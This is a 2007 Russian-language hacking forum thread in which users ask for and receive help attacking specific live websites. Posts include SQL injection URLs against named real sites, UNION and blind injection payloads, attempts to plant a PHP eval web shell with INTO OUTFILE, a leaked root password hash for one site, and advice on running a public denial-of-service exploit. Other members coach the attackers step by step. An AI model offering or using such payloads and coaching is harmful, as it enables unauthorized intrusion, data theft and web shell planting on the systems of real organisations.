Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) darky, 4.08.2007.

Статус темы:
Тема закрыта для ответов.
  1. darky

    darky ♠ ♦ ♣ ♥

    Регистрация:
    18.05.2006
    Сообщения:
    1 827
    Одобрения:
    823
    Репутация:
    1 418
    В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму).

    Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.

    Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется
     
    #1 darky, 4.08.2007
    В последний раз редактировалось модератором: 18.12.2011
  2. Red_Red1

    Red_Red1 Banned

    Регистрация:
    12.01.2007
    Сообщения:
    249
    Одобрения:
    258
    Репутация:
    83
    Расскажите про вот такую штуку.
    http://webapps.jhu.edu/needs/detail.cfm?id=1805'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
    Я вначале подумал что это MSSQL (потому и писал в запросе INFORMATION_SCHEMA.TABLES), а потом посмотрел вроде и не мс, а макромедиа. Короче не понятно мне. Плюс к тому странный выдает ответ - не найду такого-то файла, отсюда вывод что можно грузить файлы баз данных если знаешь имя файла. Но там дописывается расширение автоматом, в связи с этим пробовал %00 - не получилось. Вообщем не все мне ясно с этой базой. Может кто видел такое - поделитесь.
     
    Это одобряют 4 пользоветелей.
  3. darky

    darky ♠ ♦ ♣ ♥

    Регистрация:
    18.05.2006
    Сообщения:
    1 827
    Одобрения:
    823
    Репутация:
    1 418
    Это ColdFusion
    права у твоей небольшие - нет прав на системные таблицы. это видим из
    http://webapps.jhu.edu/needs/detail.cfm?id=1805+union+select+1,2,3,4,5,6,name,8,9,10,11,12,13+from+MSysObjects

    подбирай кол-во столбцов
    http://webapps.jhu.edu/needs/detail.cfm?id=1805+and+1=0+union+select+1,2 ...
    Загвоздка в том что запрос не выполнится пока одновременно не будет подобрано точное кол-во + подставлено в одно из полей правильное название одного из столцов (иначе база считает запрос пустым)
    либо же при наличие прав у юзера (а они часто оставляются по дефолту) выполнять любые запросы в кф базе
    http://webapps.jhu.edu/needs/detail.cfm?id=1805;запрос
     
    Это одобряют 2 пользоветелей.
  4. s1mplec0de

    s1mplec0de New Member

    Регистрация:
    30.07.2007
    Сообщения:
    2
    Одобрения:
    1
    Репутация:
    0
    brute/shell

    приветствую!

    столкнулся с такой проблемой (

    http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20mysql.user%20where%20user=char(114,111,111,116)),1,1))>=100,1,0)/*

    Error Number: 1242
    Error Message: Subquery returns more than 1 row

    а в случае

    1=if(ascii(substring((select user()),1,1))>=100,1,0)

    все работает нормально, возвращается ответ либо 1 либо 0..... то есть можно перебрать )

    права есть! пасс выглядит так.... 3553f4a3048036eb я просто не в курю почему перебирать не дает...
    ------------------------------------------------------------------
    и вторая проблема..... не могу залить шелл, хотя файл привелегии есть..... лоад_файл работает.....

    http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/*


    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',3,4,5,6,7,8 into outfile 1.txt/*' at line 2

    если <?php eval($_GET[http://server.com/cmd.php]) ?> расписать все через char то начинает ругаться на 1.txt....

    Error Number: 1064
    Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt/* AND n.status != 'Disabled' ORDER BY date DESC ' at line 2

    уже и так писал и сяк, не получается с этим серваком (((


    версия 5.0.22

    с уважением,
     
    Это одобряет 1 пользователь.
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Регистрация:
    20.01.2007
    Сообщения:
    737
    Одобрения:
    376
    Репутация:
    235
    переведи
    юзай лимит
    хотя странно, почему при where выдается не одна строка... попробуй тупо лимит 0,1 , как правило, рут - первый юзер.

    по поводу второго:

    <?php eval($_GET[http://server.com/cmd.php]) ?>

    это должно быть в кавычках
     
    #5 n1†R0x, 5.08.2007
    В последний раз редактировалось: 5.08.2007
    Это одобряет 1 пользователь.
  6. sharoff

    sharoff Member

    Регистрация:
    5.08.2007
    Сообщения:
    29
    Одобрения:
    6
    Репутация:
    0
    Если я не ошибаюсь, то загрузка файла через sql происходит путем ... union+select+1,2,3,что будем загружать,5,6..+from+существующая таблица+into+outfile+'/полный/путь/до/директории/для/записи/123.php'/*

    Т.е. вы посто забыли поставить кавычки за прописать полный путь.
     
    Это одобряет 1 пользователь.
  7. s1mplec0de

    s1mplec0de New Member

    Регистрация:
    30.07.2007
    Сообщения:
    2
    Одобрения:
    1
    Репутация:
    0
    спасибо за советы,

    1. не смог проверить сервак в дауне 8*(**** я понял в чем суть ошибки, просто меня самого смутило что возвращается какой то не однозначный ответ и не 1 и не 0 - поэтому и спрашиваю что за муть....

    2. кавычки фильтруются жестко, по формату знаю.... писал через чар, но не выходит.... ругается ошибкой 1062 кажется..... писал что синтаксическая ' без пути - без ничего.....

    www.server.com/index.php?id=1 union select 1,char(),3,4,5,6,7,8 into outfile или же from table into outfile полный путь или же просто для теста тупо 1.txt/*

    пробовал по всякому, может реально не судьба) поэтому и оставался вариант брута, хз подскажите как правильно запрос написать с лимитом.... where user= ?

    благодарю....
     
  8. sharoff

    sharoff Member

    Регистрация:
    5.08.2007
    Сообщения:
    29
    Одобрения:
    6
    Репутация:
    0
    При записи +from+table+into+outfile+'/путь/к/папке/для/записи/123.php'/* нужны реальные кавычки, char() здесь не поможет, при фильтрации кавычек эта схема невозможна.
     
  9. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Регистрация:
    6.07.2007
    Сообщения:
    292
    Одобрения:
    593
    Репутация:
    567
    select password from mysql.user where user=char(114,111,111,116) limit 0,1
    Вот это ты имел ввиду?

    Конечно может я не прав но первая мысль у меня возникла что в этой таблице два юзера "root"... Интересно это возможно или нет....
     
    #9 Dr.Z3r0, 6.08.2007
    В последний раз редактировалось: 31.05.2011
    Это одобряет 1 пользователь.
  10. s1mplec0de

    s1mplec0de New Member

    Регистрация:
    30.07.2007
    Сообщения:
    2
    Одобрения:
    1
    Репутация:
    0
    там как не странно но два пользователя с 2-мя одинаковыми пассами....

    limit помог, пасс соответственно как я и писал выше....

    root:3553f4a3048036eb
    touchandgo:3553f4a3048036eb

    http://www.touchandgorecords.com/bands/band.php?id=70%20union%20select%201,concat(USER(),char(58),VERSION(),char(58),DATABASE()),3,4,5,6,7,8/--

    ------

    именно ' там фильтруются, у меня не получилось шелл залить(

    благодарю за помощь, отдельное спасибо Dr.Z3r0 - за статью..... )
     
    #10 s1mplec0de, 7.08.2007
    В последний раз редактировалось модератором: 31.05.2011
  11. Red_Red1

    Red_Red1 Banned

    Регистрация:
    12.01.2007
    Сообщения:
    249
    Одобрения:
    258
    Репутация:
    83
    Работа с MySQL версии 5.0.27.
    Делаю такой запрос
    Все работает. Как я понимаю выводит название одной из таблиц которые есть в базе.
    Нахожу нужную таблицу через лимит.
    Составляю запрос
    Где 'wifi_points'имя таблицы полученое из предидущего запроса.
    Выводиться имя столбика - "id"
    Дальше пытаюсь вытянуть данные таким запросом
    выдает пустоту так как будто запрос неверный. Пробовал подставлять лимит 1,1 и 0,1 нифига.
    Пробую
    Т.е. проверяю есть ли такая таблица - тоже пусто.
    В итоге могу узнать полностью структуру базы но данные не могу вывести.
    Что не так? Может есть хитрости при работе с MySQL версии 5.0.27.
    Как правильно строить запрос ведь скуль есть, а результата нет?
     
  12. Termin@L

    Termin@L Elder - Старейшина

    Регистрация:
    7.12.2006
    Сообщения:
    184
    Одобрения:
    43
    Репутация:
    53
    Значит твоему пользователю закрыт доступ, такое тногда бывает, через системные таблицы видишь, а вывести не можешь((((
     
  13. sharoff

    sharoff Member

    Регистрация:
    5.08.2007
    Сообщения:
    29
    Одобрения:
    6
    Репутация:
    0
    Возможно эта таблица находится в другой базе, можно посмотреть запросом
    Выведет все существующие базы

    и если не ошибаюсь можно выдернуть интересную связку

    Я уверен что в таблице columns есть column_name и table_name, но насчет schema_name не уверен, но по-моему она там была.
     
    Это одобряет 1 пользователь.
  14. Joker-jar

    Joker-jar Elder - Старейшина

    Регистрация:
    11.03.2007
    Сообщения:
    583
    Одобрения:
    205
    Репутация:
    37
    Попробуй
    Code:
    -4+union+select+1111,table _schema,3333,4444,5555,6666 ,7777,8888+from+information_schema.tables+where+table_name='wifi_points'/*.html
     
    Это одобряют 2 пользоветелей.
  15. ANT

    ANT New Member

    Регистрация:
    7.08.2007
    Сообщения:
    4
    Одобрения:
    0
    Репутация:
    0
    Здравствуйте, мне нужна ваша помощь.
    На уязвимой странице происходит передача параметра без фильтрации, он есть особенность- значения полей не выводятся на странице, а на основе данных рисуется карта (это не важно, т.к в базе нет паролей). Я пытаюсь сделать вывод в файл с помощью INTO OUTFILE , но получаю ошибку.
    Я отправляю
    ?id=1122+UNION+SELECT+1,2+FROM+locations+INTO+OUTFILE+'name'
    (OUTFILE я пишу одним словом, без пробела Ж)
    Выдает такое
    Code:
    Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'INTO'. (severity 15) in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7
    
    Warning: mssql_query() [function.mssql-query]: Query failed in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7
    
    Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource in E:\XAMPPLITE\htdocs\info\pages\map.php on line 8
    А если запрос такой
    ?id=1122+UNION+SELECT+1,2+FROM+locations
    всё нормально, без ошибок

    PHP скрипт там такой
    PHP:
    $result mssql_query("SELECT * 
                           FROM locations
                           WHERE id = 
    $id;");
    Со скриптом возможна неточность (врядли), тк на сервере стоит немного другая версия.

    Всё вроде бы очень просто, но я не пойму что это за неправильный синтаксис возле INTO... Помогите разобраться
     
  16. sharoff

    sharoff Member

    Регистрация:
    5.08.2007
    Сообщения:
    29
    Одобрения:
    6
    Репутация:
    0
    ээм, а может быть в MSSQL немнога другие запросы поэтому и в into возникает неправильный синтаксис... Все же я не уверен, это всего лишь предположение, за неправильность не бить =)
     
    Это одобряет 1 пользователь.
  17. Joker-jar

    Joker-jar Elder - Старейшина

    Регистрация:
    11.03.2007
    Сообщения:
    583
    Одобрения:
    205
    Репутация:
    37
    http://e-catalog.rusbiz.ru/1'+and+'1'='1.html

    В чем косяк? Запрос вроде правильный, но не проходит. Подозреваю, глюк с плюсами... пробовал /**/, не канает :)
     
  18. infium

    infium New Member

    Регистрация:
    12.05.2007
    Сообщения:
    1
    Одобрения:
    0
    Репутация:
    0
    Не знаю правильно ли я выбрал раздел.
    Народ вот есть эксплоит
    MS Windows Explorer.exe Gif Image Denial of Service Exploit
    http://www.milw0rm.com/exploits/4215
    Его вроде компилировать на перле. Но не понел как его использовать. Помоги как его использовать.
     
  19. Taylorith

    Taylorith Elder - Старейшина

    Регистрация:
    6.09.2006
    Сообщения:
    175
    Одобрения:
    11
    Репутация:
    0
    вот попробовал вбить такое http://www.olympic.org/uk/news/olympic_news/full_story_uk.asp?id=2272' и выдает как видно ошибку ....
    Microsoft VBScript runtime error '800a000d'

    Type mismatch: 'cint'

    /common/asp/inc_news.asp, line 634

    хотя сами могли увидеть.... так вот... что мона сделать дальше?? )) или еще конкретней как заюзать все это... что применить?? ) заранее благодарю... )
     
  20. n1†R0x

    n1†R0x Elder - Старейшина

    Регистрация:
    20.01.2007
    Сообщения:
    737
    Одобрения:
    376
    Репутация:
    235
    Перл-сплоиты не компилируются, а интерпретируются (выполняются)
    Установи Active Perl (use g00gle 4 searching)
    Далее...
    1. если сплоит с ГУИ (с графич. интерфейс), просто кликни по нему пару раз
    2. если сплоит консольный, запускаешь cmd.exe, переходишь в каталог со сплоитом и запускаешь его, предварительно прочитав в хелпе, за что какой аргумент отвечает.

    пс: данная тема не раз обсуждалась, если все еще непонятно - юзай поиск.
     
Загрузка...
Similar Threads - вопросы уязвимостям
  1. brand29
    Ответы:
    1
    Просмотры:
    1 190
  2. +
    Ответы:
    2 246
    Просмотры:
    312 252
  3. Yandex
    Ответы:
    15
    Просмотры:
    2 536
  4. Omgg
    Ответы:
    9
    Просмотры:
    1 909
Статус темы:
Тема закрыта для ответов.